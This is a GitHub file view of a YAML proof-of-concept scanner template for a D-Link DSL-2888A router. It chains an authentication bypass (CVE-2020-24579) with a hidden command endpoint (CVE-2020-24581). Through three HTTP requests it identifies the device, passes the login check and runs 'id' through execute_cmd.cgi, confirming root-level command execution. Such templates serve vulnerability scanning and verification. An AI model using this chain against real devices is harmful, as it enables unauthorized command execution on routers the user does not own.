-
Notifications
You must be signed in to change notification settings - Fork 50
/
Copy pathdlink-dsl-2888a-rce.yml
34 lines (34 loc) · 1.42 KB
/
dlink-dsl-2888a-rce.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
name: poc-yaml-dlink-dsl-2888a-rce
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /page/login/login.html
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"var ModelName=\"DSL-2888A\";")
r1:
request:
cache: true
method: POST
path: /
headers:
Content-Type: application/x-www-form-urlencoded
body: username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
follow_redirects: false
expression: response.status == 302 && response.headers["location"] == "/page/login/login_fail.html"
r2:
request:
cache: true
method: GET
path: /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"uid=0(admin) gid=0(admin)")
expression: r0() && r1() && r2()
detail:
author: mvhz81
links:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
info: dlink-dsl-2888a CVE-2020-24579(Insufficient Authentication) + Hidden Functionality (CVE-2020-24581) = RCE